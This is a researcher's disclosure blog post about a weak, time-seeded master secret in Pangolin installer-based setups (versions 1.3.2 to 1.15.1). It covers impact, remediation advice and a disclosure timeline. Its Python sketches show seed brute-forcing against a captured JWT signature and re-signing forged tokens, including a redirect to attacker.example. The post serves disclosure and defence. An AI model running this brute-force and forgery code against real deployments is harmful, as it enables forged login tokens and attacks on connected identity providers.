What is Pangolin?

Pangolin is a 'Zero Trust Access Platform' that promises an "open-source, identity-based remote access platform built on Wireguard". It's a compelling pitch that puts them in a similar market category as other zero-trust networking management providers like Tailscale and Zscaler.

Obviously a project like this attracts everyone's attention from a security perspective. So naturally, when I was reviewing their code and saw some worrying anti-patterns with regard to application security, I got in touch with the maintainers privately.

Overview of the vulnerability and exploitation

Self-hosted Pangolin server versions 1.3.2 through 1.15.1 are vulnerable to a critical cryptographic weakness that low-privileged users can exploit post-authentication.

The primary issue is the use of a weak, time-based pseudo-random number generator (PRNG) to create the server’s master secret key, server.secret, during installation using the supplied installer binary.

This fundamental flaw allows any authenticated user with knowledge of the server’s approximate installation time to brute-force and recover the master secret offline. Depending on the resolution of this time knowledge, the search space for key brute forcing can be narrowed into the region of minutes to days, as opposed to years.

Examples of impact are expanded on later, but in short they include the possibility of forging anything this secret is responsible for, including: JWTs, license keys, and other client secrets.

Let me be clear about what this is and is not

This is not an RCE and, strictly speaking, probably is not even classifiable as a privilege escalation. It is not unauthenticated either. Pangolin servers that are exposed to the internet aren't necessarily vulnerable to this attack. I think malicious actors/insiders embedded for long periods of time in large organizations are the threat model to be concerned with for something like this, as opposed to small businesses where everyone is an admin anyway (they probably shouldn't be, but that's a different story).

Given limited time to explore the full extent of exploitation opportunities, I stopped at forging JWTs. While not immediately useful in and of itself, this represents an opportunity for an attacker to attack the IDP infrastructure, or perform other shenanigans.

While a compromised server.secret has severe security implications, readers should understand that a lot has to go 'right' for an attack to be successful here:

- Pangolin Server creation time is necessary, and still only approximates the brute-force search space. Even a 5-minute guess can take commodity hardware a day to crack the secret. However, that is based on my [probably terrible] multi-CPU-core implementation in Rust. There are probably ways to do this with a GPU that would be orders of magnitude faster.

- The server secret has an important but limited role in a Pangolin setup. I didn't fully explore license key forgery because I was more concerned with where a JWT gets us. My research indicated that it would open up possibilities to attack JWT processing and downstream infrastructure (as opposed to phishing or session takeover). In short, I can show that it is possible to overwrite any value in a JWT and then sign it correctly.

- The default installation process, as documented on Pangolin's website at the time, must have been used to set up the server. Users who did not use the install binary are likely unaffected. This does limit the impact to users who followed the documentation, although it could be argued this would be the majority of users.

- This is not an unauthenticated attack. My testing indicated that only users authenticated to the dashboard (albeit low-privileged ones) were issued with a token, signed by the secret, that could be cracked offline. As it stands, my belief is you would need a high level of privilege in an environment already. This is why my assessment of the threat model above is as it is: focused on large enterprise environments mostly concerned with insider threat and lateral movement potential.

It's possible that the above shaped Pangolin's level of response; perhaps, from their point of view, the threat model was not concerning enough to warrant coordinated disclosure.

Pangolin's response

What went well

The Pangolin team should be commended for patching this reasonably quickly upon acknowledging receipt of the security report.

What didn't go well

However, after this initial fix, they stopped responding to requests, including requests to disclose the issue to their customers via MITRE.

There was also no response to subsequent issues found in that changeset. For example, I received no reply when I reached out to inform them that:

"There is NO automatic migration that regenerates weak secrets from vulnerable installations. Users who installed versions 1.3.2 through 1.15.1 still have their weak, time-based secrets in their config files."

The above quote means that even if you do upgrade, you must still manually rotate this secret to address any concerns of compromise. I.e., their fix only works for brand-new users.

As for their customer communications on this, as far as I could tell the following is the full release notice for 1.15.2, and no further announcements were made. Readers may note that nothing in it obviously indicates that they should update to this version to address this issue.

Full Changelog: 1.15.1...1.15.2

A MITRE/GHSA disclosure gotcha

One disclosure-process wrinkle worth flagging for other indie researchers: MITRE rejected my CVE assignment request on the grounds that Pangolin "uses GHSA". Pangolin does have GitHub's Security tab enabled, but they do not actually use it as a CNA. They use it only to direct researchers toward private email contact, and explicitly forbid public security issues. MITRE appears to interpret a populated security tab as evidence of GHSA/CNA delegation, which in this case meant the CVE request was bounced even though no CNA was actually responsible for assignment. An appeal has been lodged but as of writing has not been answered.

I have published my full communications timeline at the end of this article.

Where things went wrong

For the uninitiated: developers of secure applications should be hyper-aware of the need to use cryptographically secure randomness when generating secrets.

To be completely fair, the Pangolin code was clearly intended to follow this rule.

However, there was a single edge case where it did not, and that was catastrophic for the security of the cryptography governing JWT and OIDC interactions.



Their website installation procedure encourages the admin to use this approach:

I won't get into why this is considered a bad practice; there is plenty of discussion about that elsewhere.



This script, as its name suggests, downloads a prebuilt Go binary from GitHub. This is the Pangolin installer.

Predictably this binary then needs sudo privileges in order to complete its task.

Because this is an atypical delivery approach, it all felt very opaque to me, so I decided to inspect the installer's code on GitHub before using it.



Time based secrets considered harmful



One of the jobs that the installer is tasked with is generating the root server.secret. This secret is then used in the creation of other secrets. It's a little bit like the seed of a Minecraft server, only it's alphanumeric. It should also be cryptographically random, i.e. safe from being easily guessed.

For reasons that aren't entirely clear to me, the setup process stores an initial secret in a config file. This initial secret is created using the following insecure code. Remember this; it will be important soon.

As you can see, this is done with an insecure seed (a Unix-style nanosecond timestamp).

To make matters worse, that particular flavor of rand comes from Go's math/rand package, which is not considered safe for cryptographic purposes. That's because its output is fully determined by the seed, and in our case the seed is drawn from a finite set of guessable numbers.
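To make the determinism concrete, here is a minimal sketch in Python rather than Go. It is an analogue only: Python's `random.Random` is a different generator from Go's math/rand, and the 32-character length, the alphabet, and the timestamp value are assumptions for illustration, not values taken from the Pangolin installer.

```python
import random
import string

# Assumed for illustration: an alphanumeric alphabet and a 32-character secret.
ALPHABET = string.ascii_letters + string.digits
SECRET_LEN = 32


def weak_secret(seed_ns: int) -> str:
    """Derive a 'secret' from a non-cryptographic PRNG seeded with a timestamp."""
    rng = random.Random(seed_ns)
    return "".join(rng.choice(ALPHABET) for _ in range(SECRET_LEN))


# A made-up installation time expressed in nanoseconds since the Unix epoch.
install_time_ns = 1_700_000_000_123_456_789

first = weak_secret(install_time_ns)
second = weak_secret(install_time_ns)

# Same seed in, same secret out: anyone who can guess the seed can rebuild the secret.
print(first == second)  # True
```

The point is not the specific generator but the property: once the seed is known or guessable, the "random" secret is no longer secret.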



Now to where this bites us. Later, once the config file is finalized, the database migrations kick in. One of them, I suspect added in response to a previously reported issue, is tasked with overwriting this initial secret with a much better one. Can you spot the flaw here, though?

The problem is that, thanks to the installer binary's earlier activity, the secret isn't empty at all, so it never gets overwritten. A poorly designed conditional statement was all it took to undo all of this.
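The shape of that conditional can be sketched as follows. This is a hypothetical Python reconstruction of the logic described above, not Pangolin's migration code; the function name `migrate_secret` and the config layout are invented for illustration.

```python
import secrets


def migrate_secret(config: dict) -> dict:
    """Hypothetical migration: generate a strong secret only if none is set."""
    server = config.setdefault("server", {})
    # The guard below is the flaw: a weak secret that is already present
    # counts as "set", so the strong replacement is never generated.
    if not server.get("secret"):
        server["secret"] = secrets.token_urlsafe(32)
    return config


# A config with no secret gets a strong one.
fresh = migrate_secret({"server": {}})

# A config pre-populated by an installer keeps its weak value untouched.
installed = migrate_secret({"server": {"secret": "weak-time-seeded-value"}})
print(installed["server"]["secret"])  # weak-time-seeded-value
```

A guard like this is reasonable for preserving an operator's chosen secret, which is why the bug is easy to miss: the check cannot tell a deliberate value from a weak default.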

This now means the application is running with a weak 'root' secret.

So this is why the vulnerability only exists when you use the installer (or when you populated this file yourself and expected the migrations to do something extra for you).

Under better circumstances you would expect a seed to be unguessable. This is why some places go to great lengths to generate high quality randomness.

If you are a Go developer and this is news to you, then go have a look at this. TL;DR: you actually want crypto/rand instead, for reasons that will become painfully obvious soon.
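For comparison, this is roughly what the safe version looks like. It is sketched in Python using the standard `secrets` module as a stand-in for Go's crypto/rand; the alphabet and length are assumptions, and the function name `strong_secret` is hypothetical.

```python
import secrets
import string

# Assumed for illustration: the same alphanumeric alphabet, 32 characters long.
ALPHABET = string.ascii_letters + string.digits


def strong_secret(length: int = 32) -> str:
    """Build a secret from the operating system's CSPRNG; there is no seed to guess."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


a = strong_secret()
b = strong_secret()
print(len(a), a != b)
```

There is no timestamp or other guessable input here, so knowing when the secret was generated tells an attacker nothing about its value.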

Impact

If we can find some ciphertext or signature that gets built from this secret, then conceivably we can use the time that the installer ran against it.

That is to say, "time installer ran" + "generated secret" = we can brute force the server secret.

The secret is critical in two areas of the codebase:

OIDC State Forgery (tested)

The secret is used to sign JSON Web Tokens (JWTs) that manage the OIDC login state. An attacker can forge these tokens to probe the upstream OIDC Identity Provider for weaknesses or potentially interfere with other users’ login flows. This was tested and confirmed against the latest compatible version of Keycloak at the time, but only far enough to show that JWT forgery was possible; any further testing would essentially have been against Keycloak itself. It was possible to forge a correctly signed JWT that could redirect a user to an attacker-controlled URL.

Sensitive Data Encryption and Decryption

The secret is used to sign or encrypt license keys, OIDC client secrets, session transfer tokens, and other sensitive configuration data. An attacker who obtains a database backup through some other means can decrypt this data, or change it and re-encrypt it correctly.

Exploiting the weakness in practice

A cookie stores a JWT signed with the weak secret. By iterating candidate installer timestamps within a guessed window, deriving the resulting secret from each, and testing whether it validates the JWT signature, an attacker recovers the secret offline.

The p_oidc_state cookie is left behind by the login process for any user, not just administrators. From here, all I had to do was create a program that 'borrowed' the same code that the application itself uses to make sure I generated the secret using exactly the same alphabet and cryptographic algorithms.
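The search loop described above can be sketched as follows. This is a simplified Python illustration, not my Rust proof of concept: it assumes the token is an HS256 JWT, uses Python's `random.Random` in place of Go's math/rand, and invents the secret length, the payload, and all function names.

```python
import base64
import hashlib
import hmac
import json
import random
import string

ALPHABET = string.ascii_letters + string.digits  # assumed alphabet
SECRET_LEN = 32                                  # assumed length


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def weak_secret(seed: int) -> str:
    """Stand-in for the installer's time-seeded secret generation."""
    rng = random.Random(seed)
    return "".join(rng.choice(ALPHABET) for _ in range(SECRET_LEN))


def sign_hs256(signing_input: str, secret: str) -> str:
    mac = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256)
    return b64url(mac.digest())


def make_token(payload: dict, secret: str) -> str:
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url(json.dumps(payload).encode())
    return f"{header}.{body}.{sign_hs256(header + '.' + body, secret)}"


def recover_secret(token: str, start: int, end: int):
    """Try every candidate seed in [start, end) until the signature matches."""
    signing_input, _, signature = token.rpartition(".")
    for seed in range(start, end):
        candidate = weak_secret(seed)
        if hmac.compare_digest(sign_hs256(signing_input, candidate), signature):
            return seed, candidate
    return None


# Demo: a token signed with a secret from a made-up seed, then recovered
# by searching a small window around a guessed installation time.
true_seed = 1_700_000_000_000_001_500
token = make_token({"state": "demo"}, weak_secret(true_seed))
found = recover_secret(token, true_seed - 2000, true_seed + 2000)
print(found is not None and found[0] == true_seed)
```

Everything runs offline against a single captured token, so there is nothing for the server to rate-limit or log. The real search differs only in scale: the window covers billions of nanosecond values rather than a few thousand.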

With this secret in hand, an attacker can now forge JWT-based OIDC state tokens and use them to attack any integrated identity services that Pangolin is connected to.
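Once the secret is known, forging is mechanical. The sketch below assumes an HS256-signed JWT and shows how a claim can be overwritten and the token re-signed. The claim name `redirectUrl`, the example URLs, and the function names are hypothetical and are not taken from Pangolin's token format.

```python
import base64
import hashlib
import hmac
import json


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    # Restore the padding that JWTs strip from base64url segments.
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign(signing_input: str, secret: str) -> str:
    mac = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256)
    return b64url_encode(mac.digest())


def verify(token: str, secret: str) -> bool:
    signing_input, _, signature = token.rpartition(".")
    return hmac.compare_digest(sign(signing_input, secret), signature)


def forge(token: str, secret: str, **overrides) -> str:
    """Overwrite claims in an existing token and re-sign it with a known secret."""
    header_b64, payload_b64, _ = token.split(".")
    payload = json.loads(b64url_decode(payload_b64))
    payload.update(overrides)
    new_payload = b64url_encode(json.dumps(payload).encode())
    signing_input = f"{header_b64}.{new_payload}"
    return f"{signing_input}.{sign(signing_input, secret)}"


# Demo with a made-up secret and a hypothetical claim name.
secret = "recovered-server-secret"
header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
body = b64url_encode(json.dumps({"redirectUrl": "https://app.example/cb"}).encode())
original = f"{header}.{body}.{sign(header + '.' + body, secret)}"

forged = forge(original, secret, redirectUrl="https://attacker.example/cb")
print(verify(forged, secret))  # True
```

A verifier holding the same secret cannot distinguish the forged token from a genuine one, which is what makes the recovered secret useful for probing the downstream identity provider.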

Obtaining this server creation time is not really what this blog post is about. However, inside knowledge, or even some OSINT such as certificate creation times, could conceivably be used to reduce the brute-force problem space dramatically.

I estimate that with a 5-minute time window on 32 CPU cores, my PC and proof of concept can crack it in roughly 24 hours via CPU brute force. A guess around 1 hour would take approximately 12 days on my hardware. A server with more CPUs, or a GPU-based PoC would reduce that dramatically.
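The arithmetic behind those estimates can be checked in a few lines. This is a back-of-the-envelope sketch that assumes every nanosecond value in the window is a distinct candidate seed and that throughput scales linearly with window size; the implied rate is derived from the figures above, not measured separately.

```python
NS_PER_SECOND = 1_000_000_000
SECONDS_PER_DAY = 24 * 60 * 60


def candidates(window_seconds: int) -> int:
    """Number of nanosecond-resolution seeds in a time window."""
    return window_seconds * NS_PER_SECOND


# A 5-minute window searched in roughly 24 hours implies this throughput.
five_minute_seeds = candidates(5 * 60)
implied_rate = five_minute_seeds / SECONDS_PER_DAY  # candidates per second

# At the same rate, a 1-hour window takes 12 times as long.
one_hour_days = candidates(60 * 60) / implied_rate / SECONDS_PER_DAY

print(five_minute_seeds)     # 300000000000
print(round(implied_rate))   # 3472222
print(round(one_hour_days))  # 12
```

That works out to roughly 3.5 million candidate secrets per second across 32 cores, which is why a GPU implementation or a tighter time estimate changes the picture so much.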

Recommendations

In light of the above, it is the opinion of this author that users of the self-hosted Pangolin service who used the default installer process on any version from 1.3.2 to 1.15.1 inclusive should not only update to the latest version if possible, but also rotate their server secrets as soon as practicable. Pangolin has a key rotation command; however, I do not know whether it works or what impact it would have in your environment, so please proceed with caution:

pangolin rotate-server-secret --old-secret "<current-weak-secret>" --new-secret "<new-strong-secret>"

Why assuming nobody knows when your server was created is not 'enough protection'

This is a valid argument, to an extent, in very low-risk threat models. If it's just your DVD collection that you are protecting, maybe this is OK. However, if you are using a ZTN service like Pangolin to protect company, customer, or otherwise important data, or if you are a potential target for cybercriminal or state-sponsored surveillance, these risks may not be acceptable.

Proof of Concept

First, remember that this is a post-auth issue - we need something from any logged in user that was incorrectly generated via this seed.

Exploiting this is a non-trivial exercise to do efficiently for a number of reasons, and is highly dependent on the attacker's hardware. I chose to do this on a reasonably high spec'd developer workstation (32 Cores, 64GB DDR5 RAM). Using a systems programming language like C, C++ or Rust produces good enough results. Multithreading was required to get the processing times down.
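The multithreading part is conceptually simple: the candidate window is cut into contiguous chunks, one per worker, and each worker searches its own chunk independently. Below is a minimal Python sketch of that partitioning step only. The function name `split_window` is hypothetical, and this is not how my Rust PoC is structured internally.

```python
from typing import List


def split_window(start: int, end: int, workers: int) -> List[range]:
    """Split the half-open seed range [start, end) into near-equal chunks."""
    total = end - start
    base, extra = divmod(total, workers)
    chunks = []
    cursor = start
    for i in range(workers):
        # The first `extra` workers take one additional seed each.
        size = base + (1 if i < extra else 0)
        chunks.append(range(cursor, cursor + size))
        cursor += size
    return chunks


chunks = split_window(0, 10, 3)
print([(c.start, c.stop) for c in chunks])  # [(0, 4), (4, 7), (7, 10)]
```

Because each candidate seed is tested independently, the work needs no coordination beyond stopping the other workers once one of them finds a match.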

Responsible Disclosure Timeline

For transparency, here is the timeline of disclosure-related events.

| Date (2026) | Action |
|---|---|
| Jan 24 | Initial outreach via Discord to find comms channel |
| | Pangolin confirms email as preferred channel |
| | Full security report sent to [email protected] |
| Jan 27 | Pangolin acknowledges report, commits to reviewing and updating installer |
| Jan 28 | Acknowledgement of response, offered assistance in re-testing |
| Jan 30 | Follow up, I ask about CVE assignment |
| Feb 2 | Pangolin asked for more time for patching |
| Feb 6 | 1.15.2 released fixing secret generation, I acknowledge and mention CVE assignment again. |
| Feb 12 | Follow up with no response. |
| Feb 12 | I request a CVE ID from MITRE (status: requested, pending assignment) |
| Mar 6 | Informed Pangolin of CVE reservation request and intent to write blog post/article. Offered to give them a preview with a view to coordinating disclosure: no response |
| Mar 7 | Informed Pangolin team of key rotation issue/advice: no response |
| Mar 28 | MITRE rejects CVE assignment, citing GHSA (see "A MITRE/GHSA disclosure gotcha" above) |
| Mar 29 | Appeal lodged to MITRE, no response to date |
| Apr 25 | Decision: full public disclosure on the grounds that the vendor ceased contact and MITRE rejected CVE assignment. Every effort was made to follow the de-facto standard responsible disclosure process. |
| Apr 25 | Date of this report & notification to MITRE of publication |